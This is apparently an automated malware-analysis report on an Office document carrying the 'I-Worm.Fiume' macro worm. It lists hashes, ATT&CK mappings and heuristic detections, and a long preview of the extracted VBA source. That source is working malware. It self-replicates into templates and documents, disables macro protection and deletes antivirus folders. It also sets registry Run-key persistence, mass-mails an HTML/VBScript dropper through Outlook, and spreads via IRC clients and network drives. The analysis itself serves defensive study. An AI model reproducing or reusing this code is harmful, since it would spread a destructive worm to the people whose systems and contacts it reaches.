I-Worm.Fiume Office (OLE) malware analysis — malicious · 603dc9aa09fe7418

MALICIOUS

Office (OLE)

79.5 KB Created: 2001-03-07 10:23:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: cc85e63bbc180e5fd13e061c889a54cb SHA-1: 790d94f166a2bff6bad0af4f2b409436586a00ab SHA-256: 603dc9aa09fe741814ce41081f55fd379d55c269f77003d4f0bdb4c5d6dbc586

676 Risk Score

Malware Insights

I-Worm.Fiume · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1059.003 Windows Command Shell T1204.002 Malicious File

The sample contains a legacy WordBasic macro that is obfuscated and designed to execute automatically. It attempts to create a batch file named 'msfile.bat' in the startup folder, which would allow it to persist and likely download additional malicious content. The macro also uses WScript.Shell and CreateObject, indicating it can execute arbitrary commands.

Heuristics 14

ClamAV: Win.Worm.Godog-4 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Worm.Godog-4
VBA macros detected medium 10 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
If ViAq911477846 = True And ClQe77842 = False Then Shell ("label c: Fiume"), 0
```
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set ws = CreateObject("WScript.Shell")
```

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA

Matched line in script

ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\Worm.vbs %"

Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
If ViAq911477846 = True And ClQe77842 = False Then Shell ("label c: Fiume"), 0
```
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False
```
VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATION

VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.
Matched line in script
```
Set Msg = Outlook.CreateItem(0)
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set fso = CreateObject("scripting.filesystemobject")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub AutoClose()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	25189 bytes
SHA-256: `cb3bbf8230e4d490d29d3fe97f83334e5378d5606343a7ce1359000ce4df0973`
Detection ClamAV: Doc.Trojan.Vmpc-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "fiume" Sub IWormFiume() On Error Resume Next Randomize sv = Int(Rnd * 3) + 1 If sv = 1 Then svt$ = "porno.doc" If sv = 3 Then svt$ = "readme!.doc" If sv = 2 Then svt$ = "sex.doc" HfRu11459 = GmIvSwGg & PzPe7718 & Int(Rnd * 666) SzQp4578 = JpBhAxGf & NfGi8478 & Int(Rnd * 2898) ClVeKfKf = GrHh7292 & LuPp4757 Options.ConfirmConversions = False Options.VirusProtection = False Options.SaveNormalPrompt = False ActiveDocument.VBProject.VBComponents("I-Worm.Fiume").Export "c:\I-Worm.Fiume.drv" GkSr7495 = LrQuMjNj & SgQw14098 & Int(Rnd * 7050) KtQfKlQe = HuMz9434 & DvTm8543 GrVx5948 = CwHnIoSq & RnDr2790 & Int(Rnd * 1489) ActiveDocument.ReadOnlyRecommended = False HxJj18767 = CqPtPsIs & LsIo10464 & Int(Rnd * 1459) MrKn8684 = SwMmCtNx & SgTp11704 & Int(Rnd * 8055) HmBsJsBf = CwEy6581 & JsOh15826 GqQoPeIf = OkIh8802 & QsEv12537 NnNkVyQg = AvKu16107 & HuPp8281 With Dialogs(wdDialogFileSummaryInfo) .Author = "Dr.Bobo" .Title = "Fiume" .Subject = "I-Worm.Fiume" .Keywords = "bobo_dr" .Execute End With VtRu5838 = MpGmVyNi & GhGz5888 & GhHfShKy & MsKu8711 LpIq4025$ = "c:\windows\startm~1\programs\startup\msfile.bat" FuOrSvBl = SgSw16997 & GyVi14886 FsRf88049114 = GetAttr(NormalTemplate.FullName) NyMw5713 = CePsCfLt & EyFf15059 & Int(Rnd * 1009) If FsRf88049114 = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(LpIq4025$) NyOw2641 = IsHfRgMg & EuAv15845 & PkFxJtFl & CoDi15805 PxNw6224 = BhEoExPs & TiMs2473 & NhUlJqLv & DuDx7034 If FsRf88049114 = vbReadOnly + vbArchive And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(LpIq4025$) If FsRf88049114 = vbReadOnly Then GoTo IuGnCnAk If FsRf88049114 = vbReadOnly + vbArchive Then GoTo IuGnCnAk DqSo8091 = QoHyFeMz & EyLn10271 & Int(Rnd * 4126) JyBq8914 = JlCsBzJr & AzUt9841 & Int(Rnd * 2288) CvDkBpSu = RkJf5759 & SpKe12537 If NormalTemplate.VBProject.VBComponents.Item("I-Worm.Fiume").Name <> "I-Worm.Fiume" Then ViAq911477846 = True DxCv13472 = MmNzQkSt & EfPy9748 & BiRzRvBh & LiMz1826 If ActiveDocument.VBProject.VBComponents.Item("I-Worm.Fiume").Name <> "I-Worm.Fiume" Then ClQe77842 = True IhAh10804 = TfFyOuFt & MyRu10813 & Int(Rnd * 5069) UhCm8197 = PgBmNoJt & IgKi17464 & Int(Rnd * 6247) If ViAq911477846 = True And ClQe77842 = False Then Set CtHn778491149 = NormalTemplate.VBProject.VBComponents If ViAq911477846 = False And ClQe77842 = True Then Set CtHn778491149 = ActiveDocument.VBProject.VBComponents CtHn778491149.import "c:\I-Worm.Fiume.drv" If ViAq911477846 = True And ClQe77842 = False Then Shell ("label c: Fiume"), 0 If ViAq911477846 = False And Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument TfVy13923 = AiUkSvFs & KfIy11573 & SuInHzIl & QzAr11676 PfAq9412 = FzQuVqTy & ExAq13213 & GjPgMvVk & IvAk14213 BlGj13399 = JuLrSsSx & SxIy15089 & Int(Rnd * 7728) TgByIkSy = KpPp13390 & SfRh5648 If ClQe77842 = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save OvVoOhJs = VrAi5749 & UiKy8992 KnUo4490 = MfNjIwEr & NnTm10010 & Int(Rnd * 3485) KpDlJoIh = KhGe6584 & PuBf17110 LyFr14561 = EoRtBpPr & HgOz9699 & Int(Rnd * 3900) Call dhIconDisco("C:\autorun.inf") VrCoCpGh = VeUj4678 & DtSp12098 IuGnCnAk: End Sub Sub FileNew() On Error Resume Next Call fiume IsSh13165 = KxTwMjLe & FmKm7360 & QxIyLhFp & FiTt5184 Dialogs(wdDialogFileNew).Show UgLxVfUy = MkCp3628 & SkSx17032 BvTi11903 = LjSuHgVm & KuMf10066 & HtMoVoVn & MiGt4542 Skip = 1 GtTi9582 = RmAmDoIo & MyVo10732 & RfOoLkAe & EySe13954 Call fiume TvBw14319 = AsGqDyPf & FmVo12491 & Int(Rnd * 6679) End Sub Sub FileSave() On Error Resume Next IvBlTyAj = DjMq9288 & IrSp10975 EhUuGyAg = OxQr12056 & OuIn10320 Call fiume MzTx11058 = TqTeEqGp & LzFf17207 & Int(Rnd * 9188) ActiveDocument.Save RrJx16843 = FvAqDiJs & JtFe11933 & Int(Rnd * 9957) FjEm10998 = SpNnJiAl & OiDv6590 & Int(Rnd * 1762) End Sub Sub FileClose() On Error Resume Next MkDh16439 = PoCgPxNj & KgJq6684 & Int(Rnd * 6611) DhMhQsDe = TqPz7129 & PsAy7135 Call fiume LzNgIpDp = BoJf6535 & TqLx3012 IfMy8100 = RfViCjJg & RtGx9634 & Int(Rnd * 742) If ActiveDocument.Saved = False Then ActiveDocument.Save DfIn9731 = KpLwSyVq & KyIg9703 & Int(Rnd * 8749) BoGnDsNq = JsJm13997 & SrPh14603 ActiveDocument.Close JxBoDyTq = KvOi6140 & KrUe8389 End Sub Sub ToolsOptions() On Error Resume Next HkOu9207 = UfBhSwMv & TuIg13218 & Int(Rnd * 8540) JrCg12028 = VuKnDzBx & MzNz10893 & Int(Rnd * 8510) Dialogs(wdDialogToolsOptions).Show KeTeNkMf = HvFq4673 & GyNl14264 GpIfDiEr = FxGh3287 & QoPv15673 Call fiume PwRmTxRv = GrNg4665 & EtFx10271 VqTz7344 = IlJwCsAg & MuPo15284 & Int(Rnd * 9349) End Sub Sub EditFind() On Error Resume Next CnMhOgEm = KwHs16298 & AkKl9853 Dialogs(wdDialogEditFind).Show JgNf14151 = NvMeGzLh & TzHt4836 & CgIpLjRq & HkUr9332 Call fiume HvGt8260 = SuSgOwAo & EqSr17946 & Int(Rnd * 9201) EnGx5374 = IsCuFiOf & FyOf10062 & Int(Rnd * 3721) End Sub Sub FileSaveAs() On Error Resume Next QvOo8148 = AqDjPjDv & AjLe16190 & HsMkUmRr & VvTo9572 DjEf10682 = MhDlCwJv & KnBy9849 & BnBuUjFh & TmOe16200 Dialogs(wdDialogFileSaveAs).Show QvRo15075 = GiRsJkEi & AeGu6976 & Int(Rnd * 6719) SuQo8659 = UtOfRfHu & QpSs3603 & Int(Rnd * 240) Call fiume End Sub Sub FilePrint() On Error Resume Next InFk9886 = DxGkCnAv & KgBm8422 & Int(Rnd * 3314) PiTf15370 = FhOfKgSj & KlFq15322 & SeLxKuNk & HgAo13672 Dialogs(wdDialogFilePrint).Show GnVg10526 = NeRpSiDf & AiRm1402 & LzByUiBt & MwKw11802 UsFi9537 = LiEvNlOt & NtTt9051 & NrKeMeBo & SqSy11385 Call fiume TxNg14501 = EpNpQeTj & QmKm4207 & Int(Rnd * 6984) RvRkTjBh = RzHj15804 & IjUx10481 End Sub Sub FileExit() On Error Resume Next KnSxVsKx = CpSy7687 & KzKj11054 QeEkUoQi = MvAv8746 & BkQf5729 Call fiume If ActiveDocument.Saved = False Then ActiveDocument.Save KuVv8419 = BuSuKpVq & GvMf11248 & Int(Rnd * 3458) GuAm3907 = GpOhNkNw & ArEu12888 & Int(Rnd * 7097) Application.WindowState = wdWindowStateMinimize pName = CurDir & "\" fName = Dir(pName & ".doc", sAttr) If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call fiume Do While (fName <> "") fName = Dir() If (fName <> "") And _ ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call fiume End If Loop ChangeFileOpenDirectory "p:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False ChangeFileOpenDirectory "h:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False ChangeFileOpenDirectory "f:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False Application.Quit GwBw11252 = PuCxPzQo & UxKk7995 & Int(Rnd 1904) End Sub Sub AutoOpen() On Error Resume Next NeGg7895 = KkIfKmMv & OsMg14764 & OsTvFwOw & QyCj12687 Call fiume JwUyCmLw = NzTs5859 & OsKf6355 End Sub Sub AutoExit() On Error Resume Next Call fiume IhRzPeAp = UiGf7899 & DlOz2777 LpHx8174 = MfPvBxGt & LeIs9187 & Int(Rnd * 5798) Application.WindowState = wdWindowStateMinimize pName = CurDir & "\" fName = Dir(pName & ".doc", sAttr) If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call fiume Do While (fName <> "") fName = Dir() If (fName <> "") And _ ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call fiume End If Loop If ActiveDocument.Saved = False Then ActiveDocument.Save ChangeFileOpenDirectory "p:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False ChangeFileOpenDirectory "r:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False ChangeFileOpenDirectory "s:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False End Sub Sub AutoExec() On Error Resume Next IeSt10663 = PwHgNlLm & BkLs11300 & Int(Rnd 9318) EwDq12244 = UfDkPxCr & BeSo5085 & Int(Rnd * 4200) Call fiume VwIkFlKt = HtBx7199 & GmAj16065 End Sub Sub AutoClose() On Error Resume Next BvQxRsHv = CeBp12125 & EoHu9252 Call fiume TmUe4077 = SyUwRiCm & ItCs10407 & Int(Rnd * 3903) End Sub Sub ToolsMacro() On Error Resume Next KvClGgUv = BiUz9826 & EoLl9617 KvNlTsLp = DhHs5991 & ArNh1215 Call fiume JqMyCzGo = SmCw8843 & RpQz11318 UtTo14241 = RsTyUfGj & IsDt18218 & Int(Rnd * 9831) PwVp3493 = QhHsRuUr & HkLe18337 & Int(Rnd * 501) HyDwKhGt = MsQu9261 & OvBf10378 MsgBox "Word Basic Err =7" OxKqOpOq = LhCh11312 & HsMq9020 KgKhSmFm = LfFf13680 & RnJh9360 End Sub Sub FileTemplates() On Error Resume Next PiFv8874 = NfMtHfFl & HnPp7814 & OkCjIvTz & FgFf7378 TqBt3408 = KnEkEvEw & OuBf9577 & Int(Rnd * 1158) Call fiume ItFl4563 = AiOfRoHx & OuLi14709 & GqCwExCu & UtTe613 RiOkCvEf = KsHe6273 & AeTo6253 UsEh7681 = DlHnVpHw & MwCm5469 & Int(Rnd * 2523) MtEu9075 = RoRrOtPr & UyTp3070 & SfRhVeLv & GwTl8076 MsgBox "Word Basic Err =7" BmJzHmFz = EzIe11267 & JyEh10143 FpGiCjJe = MzDo16587 & RzDq17949 End Sub Sub ViewVBCode() On Error Resume Next HfFmRrIz = EsGu11424 & RxSt5992 CtJgGyKh = IsJx5407 & KnIl6697 Call fiume OeCvMoUk = JsQl11369 & LpGp10118 MsgBox "Word Basic Err =7" ApCrFvPs = JyJq16634 & OyNl9439 End Sub Sub KillAV() On Error Resume Next Kill "C:\Program Files\AntiViral Toolkit Pro\." Kill "C:\eSafe\Protect\." Kill "C:\Program Files\Command Software\F-PROT\." Kill "C:\Program Files\Command Software\F-PROT95\." Kill "C:\Program Files\Command Software\F-PROT98\." Kill "C:\Program Files\Command Software\F-PROT 2000\." Kill "C:\Program Files\Command Software\F-PROT 2001\." Kill "C:\PC-Cillin\." Kill "C:\PC-Cillin 95\." Kill "C:\PC-Cillin 97\." Kill "C:\PC-Cillin 2000\." Kill "C:\PC-Cillin 2001\." Kill "C:\Program Files\Quick Heal\." Kill "C:\Program Files\FWIN32" Kill "C:\Program Files\FindVirus\." Kill "C:\Toolkit\FindVirus\." Kill "C:\f-macro\." Kill "C:\Program Files\McAfee\VirusScan\." Kill "C:\Program Files\McAfee\VirusScan95\." Kill "C:\Program Files\McAfee\VirusScan98\." Kill "C:\Program Files\McAfee\VirusScan 2000\." Kill "C:\Program Files\McAfee\VirusScan 2001\." Kill "C:\Program Files\Norton AntiVirus\." Kill "C:\TBAVW\." Kill "C:\TBAVW95\." Kill "C:\TBAVW98\." Kill "C:\TBAVW 2000\." Kill "C:\TBAVW 2001\." Kill "C:\VS\." Kill "C:\VS95\." Kill "C:\VS98\." Kill "C:\VS 2000\." Kill "C:\VS 2001\." End Sub Function Antidelete() On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set Myself = fso.opentextfile(wscript.scriptfullname, 1) MyCode = Myself.readall Myself.Close Do If Not (fso.fileexists(wscript.scriptfullname)) Then Set Myself = fso.CreateTextFile(wscript.scriptfullname, True) Myself.Write MyCode Myself.Close End If Loop End Function Function Dodrives() On Error Resume Next Set fso = CreateObject("scipting.filesystemobject") Set Drives = fso.Drives For Each Drive In Drives If Drive.Drivetype = Remote Then Drivefull = Drive & "\" Call Subfolders(Drivefull) ElseIf Drive.IsReady Then Drivefull = Drive & "\" Call Subfolders(Drivefull) End If Next End Function Function Run() On Error Resume Next Set ws = CreateObject("WScript.Shell") ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\Worm.vbs %" Next End Function Function Subfolders(path) On Error Resume Next newpath = path Set Fold = fso.GetFolder(newpath) Set Files = Fold.Files For Each file In Files If fso.GetExtensionName(file.path) = "doc" Then fso.copyfile wscript.scriptfullname, file.path, True End If If fso.GetExtensionName(file.path) = "dot" Then fso.copyfile wscript.scriptfullname, file.path, True End If If file.Name = "mirc.ini" Then Mirc (file.ParentFolder) End If If file.Name = "Pirch32.exe" Then Pirch (file.ParentFolder) End If Next Set file = Fold.Subfolders For Each Subfol In file Call Subfolders(Subfol.path) Next End Function Function OutlookBody() On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Myself = fso.opentextfile(wscript.scriptfullname, 1) I = 1 Do While Myself.atendofstream = False MyLine = Myself.readline Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) & "&chr(34)&" & Chr(34)) Loop Myself.Close htm = "<" & "HTML><" & "HEAD><" & "META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html; charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><" & "META content=" & Chr(34) & "MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><" & "STYLE></" & "STYLE></" & "HEAD><" & "BODY bgColor=#ffffff><" & "SCRIPT language=vbscript>" htm = htm & vbCrLf & "On Error Resume Next" htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "scripting.filesystemobject" & Chr(34) & ")" htm = htm & vbCrLf & "If Err.Number <> 0 Then" htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see this e-mail.<br>Please open this message again and click accept ActiveX<br>Microsoft Outlook</font>" & Chr(34) & "" htm = htm & vbCrLf & "Else" htm = htm & vbCrLf & "Set vbs = fso.createtextfile(fso.getspecialfolder(0) & " & Chr(34) & "\Worm.vbs" & Chr(34) & ", True)" htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34) htm = htm & vbCrLf & "vbs.Close" htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")" htm = htm & vbCrLf & "ws.run fso.getspecialfolder(0) & " & Chr(34) & "\wscript.exe " & Chr(34) & " & fso.getspecialfolder(0) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & "" htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "This message has permanent errors.<br>Sorry<br>" & Chr(34) & "" htm2 = htm2 & vbCrLf & "End If" htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>" HtmlBody = htm & htm2 Set mapi = Outlook.GetNameSpace("MAPI") Set Mapiadd = mapi.AddressLists For Each Addresslist In Mapiadd If Addresslist.AddressEntries.Count <> 0 Then AddCount = Addresslist.AddressEntries.Count Set Msg = Outlook.CreateItem(0) Msg.Subject = "Re: 4You" Msg.HtmlBody = HtmlBody Msg.DeleteAfterSubmit = True For II = 1 To AddCount Set Addentry = Addresslist.AddressEntries(II) If AddCount = 1 Then Msg.BCC = Addentry.Address Else Msg.BCC = Msg.BCC & "; " & Addentry.Address End If Next Msg.Send End If Next Outlook.Quit End If Next End Function Function Mirc(path) On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set ws = CreateObject("wscript.shell") If path = "" Then If fso.fileexists("c:\mirc\mirc.ini") Then path = "c:\mirc" If fso.fileexists("c:\mirc32\mirc.ini") Then path = "c:\mirc32" pfDir = ws.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") If fso.fileexists(pfDir & "\mirc\mirc.ini") Then path = pfDir & "\mirc" End If If path <> "" Then Set Script = fso.CreateTextFile(path & "\script.ini", True) Script.WriteLine "[script]" Script.WriteLine "n0=on 1:JOIN:#:{" Script.WriteLine "n1= /if ( $nick == $me ) { halt }" Script.WriteLine "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick c:\windows\worm.vbs" Script.WriteLine "n3=}" Script.Close End If Next End Function Function Pirch(path) On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set ws = CreateObject("wscript.shell") If path = "" Then If fso.fileexists("c:\pirch\Pirch32.exe") Then path = "c:\pirch" If fso.fileexists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32" pfDir = ws.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") If fso.fileexists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe" End If If path <> "" Then Set Script = fso.CreateTextFile(path & "\events.ini", True) Script.WriteLine "[Levels]" Script.WriteLine "Enabled=1" Script.WriteLine "Count=6" Script.WriteLine "Level1=000-Unknowns" Script.WriteLine "000-UnknownsEnabled=1" Script.WriteLine "Level2=100-Level 100" Script.WriteLine "100-Level 100Enabled=1" Script.WriteLine "Level3=200-Level 200" Script.WriteLine "200-Level 200Enabled=1" Script.WriteLine "Level4=300-Level 300" Script.WriteLine " 300-Level 300Enabled=1" Script.WriteLine "Level5=400-Level 400 " Script.WriteLine "400-Level 400Enabled=1" Script.WriteLine "Level6=500-Level 500" Script.WriteLine "500-Level 500Enabled=1" Script.WriteLine "" Script.WriteLine "[000-Unknowns]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[100-Level 100]" Script.WriteLine "User1=!@" Script.WriteLine "UserCount=1" Script.WriteLine "Event1=ON JOIN:#:/" & Chr(100) & Chr(99) & Chr(99) & " tsend $nick c:\windows\worm.vbs" Script.WriteLine "EventCount=1" Script.WriteLine "" Script.WriteLine "[200-Level 200]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[300-Level 300]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[400-Level 400]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[500-Level 500]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.Close End If Next End Function Sub Worm() On Error Resume Next Dim A01 Dim A02 Dim A03 Dim A04 Dim A08 Dim A06 Dim A07 Dim A05 Dim A09 Dim A10 Set A01 = CreateObject("Scripting.FileSystemObject") A01.copyfile wscript.scriptfullname, A01.BuildPath(A01.GetSpecialFolder(1), "WORM.VBS") Set A02 = CreateObject("WScript.Shell") A02.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & "Fiume", A01.BuildPath(A01.GetSpecialFolder(1), "WORM.VBS") Set A03 = CreateObject("WScript.Network") Set A08 = A03.EnumNetworkDrives If A08.Count <> 0 Then For A04 = 0 To A08.Count - 1 If InStr(A08.Item(A04), "\") <> 0 Then A01.copyfile wscript.scriptfullname, A01.BuildPath(A08.Item(A04), "WORM.VBS") End If Next End If A04 = A02.RegRead("HKEY_LOCAL_MACHINE\" & "WORM") If A04 = "" Or A04 > 20 Then A04 = 0 End If If A04 = 0 Then Set A05 = CreateObject("Outlook.Application") Set A06 = A05.GetNameSpace("MAPI") For Each A07 In A06.AddressLists Set A08 = A05.CreateItem(0) For A09 = 1 To A07.AddressEntries.Count Set A10 = A07.AddressEntries(A09) If A09 = 1 Then A08.BCC = A10.Address Else A08.BCC = A08.BCC & "; " & A10.Address End If Next A08.Subject = "Fiume [Croatia]" A08.Body = "Welcom to Fiume a town in Croatia. Attachment is a photo of Fiume." A08.Attachmets.Add wscript.scriptfullname A08.DeleteAfterSubmit = True A08.Send Next A04 = 0 End If A02.regwrite "HKEY_LOCAL_MACHINE\" & "WORM", A04 + 1 End If Next End Function Sub vBitchES(strFile As String) Dim hFile As Long On Error Resume Next n$ = NormalTemplate DzFx9222 = EuOjSgNm & EwTi7185 & Int(Rnd 2775) OxTs13413 = TvGvLxPz & BnUo9171 & Int(Rnd * 3822) Part11$ = "attrib -h -r " LhMjVjFg = DoFx11195 & BrBi14214 IuLhIrUn = OqMl14555 & OyDo18522 snag$ = "c:\progra~1\micros~1\templa~1\" BoGrGpRt = IiGp14814 & DjSz11735 ApQtTyNl = VqAm13912 & UxEt2910 snag1$ = "c:\progra~1\micros~2\templa~1\" UmJiSvTv = AwAe5143 & CmKs15650 RtUrUgLn = NuJu12255 & OyGf8889 Part2$ = "del " PzBg7686 = MsJxGrTe & VoAu5063 & OlOnCeOl & KyVu3992 NfOk8744 = EnRnIeBp & IeGr12362 & Int(Rnd * 3643) hFile = FreeFile Open strFile For Output Access Write As hFile Print #hFile, "@echo off" Print #hFile, Part11$ + snag$ + n$ Print #hFile, Part11$ + snag1$ + n$ Print #hFile, Part2$ + snag$ + n$ Print #hFile, Part2$ + snag1$ + n$ Print #hFile, "cls" Print #hFile, Part2$ + "c:\windows\startm~1\programs\startup\msfile.bat" Close hFile LzFwGoNk = BsBl10417 & LtBt4581 NrOxTlNe = GmKn10000 & OnQs5520 End Sub Sub dhIconDisco(strFile As String) Dim hFile As Long On Error Resume Next Randomize DeQg8791 = NiCiFgDx & HyOp13907 & KgIfOtRz & SmHp10236 Choice = Int(Rnd * 2) MxIm10197 = TrLjSrPn & NxDe580 & InGvFeJh & IlJg9932 OeOiDxPp = RrNz10992 & RyAk9489 rnn$ = Int(Rnd * 66) + 2 OmRrKrCn = ReTf14951 & AgTu15756 MqSg15951 = MwPqPqSw & GiTx7569 & NpVqSpIr & QoSn12426 rn$ = Int(Rnd * 27) + 1 GyLtMwRr = DvJm8063 & GlOf9072 HoQj17165 = CtJxBrHf & CyJj13317 & Int(Rnd * 4149) Part1$ = "[autorun]" PmSt12701 = QjMgCoAt & RsJw6504 & JjCtMgFs & BkIf5606 CvNoRzNq = SvOx12741 & UkPt11265 Part2$ = "icon = c:\windows\system\pifmgr.dll," PtVz1155 = GoDvUuFe & QzRr15194 & NwEiVmRm & TeFo9394 FjKiKjNz = PnBy3408 & CtHs11317 Part22$ = "icon = c:\windows\SYSTEM\shell32.dll," AiDv11465 = AtEpDwUm & AuUe7290 & Int(Rnd * 3505) Part3$ = Part2$ + rn$ CrNq11632 = KsBpMtNg & NiKo10070 & Int(Rnd * 8290) DmJt13596 = AzGhCfJe & LlNp5701 & Int(Rnd * 6080) Part33$ = Part22$ + rnn$ hFile = FreeFile Open strFile For Output Access Write As hFile Print #hFile, Part1$ If Choice = 0 Then Print #hFile, Part3$ Else Print #hFile, Part33$ End If Close hFile LsLr16081 = BkLuSnRw & GzIf13075 & Int(Rnd * 4214) FyPg9094 = RqNuIeJk & 